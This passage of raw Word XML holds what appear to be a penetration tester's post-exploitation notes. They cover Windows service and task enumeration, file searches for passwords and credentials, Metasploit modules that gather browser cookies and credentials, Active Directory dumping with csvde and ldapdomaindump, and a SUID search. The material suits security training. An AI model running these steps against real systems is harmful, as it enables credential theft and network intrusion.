          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>*BROWSER INFO</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E7A9E06" w14:textId="77777777" w:rsidR="007B3D1E" w:rsidRPr="007B3D1E" w:rsidRDefault="007B3D1E" w:rsidP="007B3D1E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3D1E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>*SERVICES</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="210D33BC" w14:textId="77777777" w:rsidR="007B3D1E" w:rsidRPr="007B3D1E" w:rsidRDefault="007B3D1E" w:rsidP="007B3D1E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3D1E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>sc qc [service name]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="128667D3" w14:textId="77777777" w:rsidR="007B3D1E" w:rsidRPr="007B3D1E" w:rsidRDefault="007B3D1E" w:rsidP="007B3D1E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4949C9CA" w14:textId="77777777" w:rsidR="007B3D1E" w:rsidRPr="007B3D1E" w:rsidRDefault="007B3D1E" w:rsidP="007B3D1E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3D1E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>*SCHEDULED TASKS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ECF36CE" w14:textId="77777777" w:rsidR="007B3D1E" w:rsidRPr="007B3D1E" w:rsidRDefault="007B3D1E" w:rsidP="007B3D1E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3D1E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>schtasks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E76504E" w14:textId="77777777" w:rsidR="007B3D1E" w:rsidRPr="007B3D1E" w:rsidRDefault="007B3D1E" w:rsidP="007B3D1E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3D1E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:tab/>
        <w:t>runs on idle</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BF3A782" w14:textId="77777777" w:rsidR="007B3D1E" w:rsidRPr="007B3D1E" w:rsidRDefault="007B3D1E" w:rsidP="007B3D1E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D6E2B00" w14:textId="77777777" w:rsidR="007B3D1E" w:rsidRPr="007B3D1E" w:rsidRDefault="007B3D1E" w:rsidP="007B3D1E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3D1E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>*CREDS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="167473BF" w14:textId="77777777" w:rsidR="007B3D1E" w:rsidRPr="007B3D1E" w:rsidRDefault="007B3D1E" w:rsidP="007B3D1E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3D1E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>dir /s *pass*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C892A93" w14:textId="77777777" w:rsidR="007B3D1E" w:rsidRPr="007B3D1E" w:rsidRDefault="007B3D1E" w:rsidP="007B3D1E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3D1E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>dir /s *cred*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0533081F" w14:textId="77777777" w:rsidR="007B3D1E" w:rsidRPr="007B3D1E" w:rsidRDefault="007B3D1E" w:rsidP="007B3D1E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3D1E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>dir /s *vnc*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11CB4204" w14:textId="77777777" w:rsidR="007B3D1E" w:rsidRPr="007B3D1E" w:rsidRDefault="007B3D1E" w:rsidP="007B3D1E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3DB04222" w14:textId="77777777" w:rsidR="007B3D1E" w:rsidRPr="007B3D1E" w:rsidRDefault="007B3D1E" w:rsidP="007B3D1E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3D1E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>*PRESENCE (metasploit)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DE5F269" w14:textId="77777777" w:rsidR="007B3D1E" w:rsidRPr="007B3D1E" w:rsidRDefault="007B3D1E" w:rsidP="007B3D1E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3D1E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>getuid</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69917ABD" w14:textId="77777777" w:rsidR="007B3D1E" w:rsidRPr="007B3D1E" w:rsidRDefault="007B3D1E" w:rsidP="007B3D1E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3D1E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>getpid</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D1E8146" w14:textId="77777777" w:rsidR="007B3D1E" w:rsidRPr="007B3D1E" w:rsidRDefault="007B3D1E" w:rsidP="007B3D1E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3D1E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>ps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66522163" w14:textId="77777777" w:rsidR="007B3D1E" w:rsidRPr="007B3D1E" w:rsidRDefault="007B3D1E" w:rsidP="007B3D1E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3D1E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>ls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77D7AD53" w14:textId="77777777" w:rsidR="007B3D1E" w:rsidRPr="007B3D1E" w:rsidRDefault="007B3D1E" w:rsidP="007B3D1E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3D1E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>screenshot</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28214B9B" w14:textId="77777777" w:rsidR="007B3D1E" w:rsidRPr="007B3D1E" w:rsidRDefault="007B3D1E" w:rsidP="007B3D1E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3D1E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>showmount</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="205E35EE" w14:textId="77777777" w:rsidR="007B3D1E" w:rsidRPr="007B3D1E" w:rsidRDefault="007B3D1E" w:rsidP="007B3D1E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3D1E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>post/windows/gather/enum_shares</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59479CEA" w14:textId="77777777" w:rsidR="007B3D1E" w:rsidRPr="007B3D1E" w:rsidRDefault="007B3D1E" w:rsidP="007B3D1E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3D1E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:tab/>
        <w:t>tells you what shares are on your current machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B5B925A" w14:textId="77777777" w:rsidR="007B3D1E" w:rsidRPr="007B3D1E" w:rsidRDefault="007B3D1E" w:rsidP="007B3D1E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3D1E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>post/windows/gather/enum_termserv</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="730A5C43" w14:textId="77777777" w:rsidR="007B3D1E" w:rsidRPr="007B3D1E" w:rsidRDefault="007B3D1E" w:rsidP="007B3D1E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3D1E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>post/windows/gather/enum_ie</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F8260CF" w14:textId="77777777" w:rsidR="007B3D1E" w:rsidRPr="007B3D1E" w:rsidRDefault="007B3D1E" w:rsidP="007B3D1E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3D1E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:tab/>
        <w:t>history, cookies, creds</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77C8E9BF" w14:textId="77777777" w:rsidR="007B3D1E" w:rsidRPr="007B3D1E" w:rsidRDefault="007B3D1E" w:rsidP="007B3D1E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3D1E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>post/windows/gather/enum_chrome</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71BC2AA9" w14:textId="77777777" w:rsidR="007B3D1E" w:rsidRPr="007B3D1E" w:rsidRDefault="007B3D1E" w:rsidP="007B3D1E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3D1E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:tab/>
        <w:t>history, cookies, creds</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ABD9359" w14:textId="77777777" w:rsidR="007B3D1E" w:rsidRPr="007B3D1E" w:rsidRDefault="007B3D1E" w:rsidP="007B3D1E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3D1E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>post/windows/gather/usb_history</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35CAA436" w14:textId="77777777" w:rsidR="007B3D1E" w:rsidRPr="007B3D1E" w:rsidRDefault="007B3D1E" w:rsidP="007B3D1E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A0A6E27" w14:textId="77777777" w:rsidR="007B3D1E" w:rsidRPr="007B3D1E" w:rsidRDefault="007B3D1E" w:rsidP="007B3D1E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3D1E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>csvde - bloodhound before it exsisted</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D30B366" w14:textId="77777777" w:rsidR="007B3D1E" w:rsidRPr="007B3D1E" w:rsidRDefault="007B3D1E" w:rsidP="007B3D1E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3D1E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:tab/>
        <w:t>downloads all of AD very fast into a csv file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="105F12BE" w14:textId="77777777" w:rsidR="007B3D1E" w:rsidRPr="007B3D1E" w:rsidRDefault="007B3D1E" w:rsidP="007B3D1E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3D1E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:tab/>
        <w:t>don't need special privs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A5ECFD4" w14:textId="77777777" w:rsidR="007B3D1E" w:rsidRPr="007B3D1E" w:rsidRDefault="007B3D1E" w:rsidP="007B3D1E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3D1E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="007B3D1E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:tab/>
        <w:t>csvde -f test.csv</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1257B276" w14:textId="77777777" w:rsidR="007B3D1E" w:rsidRPr="007B3D1E" w:rsidRDefault="007B3D1E" w:rsidP="007B3D1E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3D1E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>unattended.xml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4966266B" w14:textId="77777777" w:rsidR="007B3D1E" w:rsidRPr="007B3D1E" w:rsidRDefault="007B3D1E" w:rsidP="007B3D1E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3D1E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:tab/>
        <w:t>local admin creds, domain join creds</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EDCB0A2" w14:textId="77777777" w:rsidR="007B3D1E" w:rsidRPr="007B3D1E" w:rsidRDefault="007B3D1E" w:rsidP="007B3D1E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3D1E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:tab/>
        <w:t>instructions on how to build machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="237127EC" w14:textId="77777777" w:rsidR="007B3D1E" w:rsidRPr="007B3D1E" w:rsidRDefault="007B3D1E" w:rsidP="007B3D1E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3D1E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="47153FF5" w14:textId="77777777" w:rsidR="007B3D1E" w:rsidRPr="007B3D1E" w:rsidRDefault="007B3D1E" w:rsidP="007B3D1E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3D1E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>ldapdomaindump</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15436ED3" w14:textId="77777777" w:rsidR="007B3D1E" w:rsidRPr="007B3D1E" w:rsidRDefault="007B3D1E" w:rsidP="007B3D1E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3D1E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:tab/>
        <w:t>csvde for python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56FF5FCE" w14:textId="77777777" w:rsidR="007B3D1E" w:rsidRPr="007B3D1E" w:rsidRDefault="007B3D1E" w:rsidP="007B3D1E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3D1E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:tab/>
        <w:t>use in lab, run in empty folder</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E0B42CC" w14:textId="77777777" w:rsidR="007B3D1E" w:rsidRPr="007B3D1E" w:rsidRDefault="007B3D1E" w:rsidP="007B3D1E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="310E413C" w14:textId="77777777" w:rsidR="007B3D1E" w:rsidRPr="007B3D1E" w:rsidRDefault="007B3D1E" w:rsidP="007B3D1E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3D1E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>3rd party "good" binaries</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AE96C53" w14:textId="77777777" w:rsidR="007B3D1E" w:rsidRPr="007B3D1E" w:rsidRDefault="007B3D1E" w:rsidP="007B3D1E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3D1E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:tab/>
        <w:t>boxcutter - screenshot utility, captures multiple screens in high res</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37ED513E" w14:textId="77777777" w:rsidR="007B3D1E" w:rsidRPr="007B3D1E" w:rsidRDefault="007B3D1E" w:rsidP="007B3D1E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3D1E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:tab/>
        <w:t>phantomJS - screenshots web apps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26528DFE" w14:textId="77777777" w:rsidR="007B3D1E" w:rsidRPr="007B3D1E" w:rsidRDefault="007B3D1E" w:rsidP="007B3D1E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3D1E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:tab/>
        <w:t>WMIPlant</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="481E1447" w14:textId="77777777" w:rsidR="007B3D1E" w:rsidRPr="007B3D1E" w:rsidRDefault="007B3D1E" w:rsidP="007B3D1E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44FCBAD0" w14:textId="77777777" w:rsidR="007B3D1E" w:rsidRPr="007B3D1E" w:rsidRDefault="007B3D1E" w:rsidP="007B3D1E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3D1E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>UNIX: GTFO bins</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E97A14B" w14:textId="77777777" w:rsidR="007B3D1E" w:rsidRPr="007B3D1E" w:rsidRDefault="007B3D1E" w:rsidP="007B3D1E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3D1E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:tab/>
        <w:t>list of binaries that can be exploited by an attacker</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A138B06" w14:textId="77777777" w:rsidR="007B3D1E" w:rsidRPr="007B3D1E" w:rsidRDefault="007B3D1E" w:rsidP="007B3D1E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3D1E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>find / -user root -perms 4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AC91150" w14:textId="77777777" w:rsidR="007B3D1E" w:rsidRPr="007B3D1E" w:rsidRDefault="007B3D1E" w:rsidP="007B3D1E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7EAA0360" w14:textId="77777777" w:rsidR="007B3D1E" w:rsidRPr="007B3D1E" w:rsidRDefault="007B3D1E" w:rsidP="007B3D1E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3D1E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>banking, medical, bank are websites that legally can't be monitored by companies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B50677E" w14:textId="77777777" w:rsidR="007B3D1E" w:rsidRPr="007B3D1E" w:rsidRDefault="007B3D1E" w:rsidP="007B3D1E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="369F4316" w14:textId="77777777" w:rsidR="007B3D1E" w:rsidRPr="007B3D1E" w:rsidRDefault="007B3D1E" w:rsidP="007B3D1E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3D1E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>process listings are a treasure trove of information</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16DD7591" w14:textId="77777777" w:rsidR="007B3D1E" w:rsidRPr="007B3D1E" w:rsidRDefault="007B3D1E" w:rsidP="007B3D1E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="48F3F598" w14:textId="77777777" w:rsidR="007B3D1E" w:rsidRPr="007B3D1E" w:rsidRDefault="007B3D1E" w:rsidP="007B3D1E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3D1E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>gpresults -z</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5221B1B8" w14:textId="77777777" w:rsidR="007B3D1E" w:rsidRPr="007B3D1E" w:rsidRDefault="007B3D1E" w:rsidP="007B3D1E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3D1E">
        <w:rPr>
